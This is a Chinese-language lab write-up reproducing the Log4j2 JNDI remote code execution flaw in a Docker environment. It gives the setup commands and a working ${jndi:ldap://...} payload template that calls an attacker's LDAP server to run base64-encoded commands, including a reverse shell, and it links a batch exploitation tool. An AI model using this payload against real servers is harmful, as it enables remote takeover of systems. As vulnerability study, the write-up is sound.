log4j命令注入漏洞复现

漏洞描述

     Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。Spring-Boot-strater-log4j2、Apache Struts2、Apache Solr、Apache Flink、Apache Druid、ElasticSearch、Flume、Dubbo、Redis、Logstash、Kafka均受影响。

影响范围：

Apache Log4j 2.x < 2.15.0-rc2

漏洞复现：

使用Log4j2漏洞环境进行复现，环境下载地址：https://github.com/fengxuangit/log4j_vuln

docker创建环境命令:

docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
docker exec -it log4j_vuln_container /bin/bash
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

使用本地kali服务器docker拉取环境。

环境启动成功后，访问http://127.0.0.1/webstudy/hello-fengxuan，漏洞post参数为c。

漏洞环境部署完毕，开始漏洞复现。首先需要一台公网vps（起ldap服务、接受反弹shell）。

vps起ldap服务，工具地址：https://github.com/feihong-cs/JNDIExploit（好多复现过程中遇到jdk版本不加载恶意类的情况，导致漏洞无法复现，github有能生成能绕过JDK限制JNDI链接的工具，大家可以使用试试）。

ldap服务启动之后，去抓包发送payload，把要执行的命令base64加密后放入payload中。

先创建一个文件touch /tmp/123 发送payload。
payload为 ${jndi:ldap://x:x:x:x:1389/Basic/Command/Base64/base64命令}

vps上的 JNDIExploit监听已经接收到了恶意请求。

查看docker镜像/tmp路径，123文件创建成功。

反弹shell同理，将反弹shell命令base64加密后放入payload发送。

反弹shell成功。 

最后附一款GUI工具，项目地址：GitHub - inbug-team/Log4j_RCE_Tool: Log4j 多线程批量检测利用工具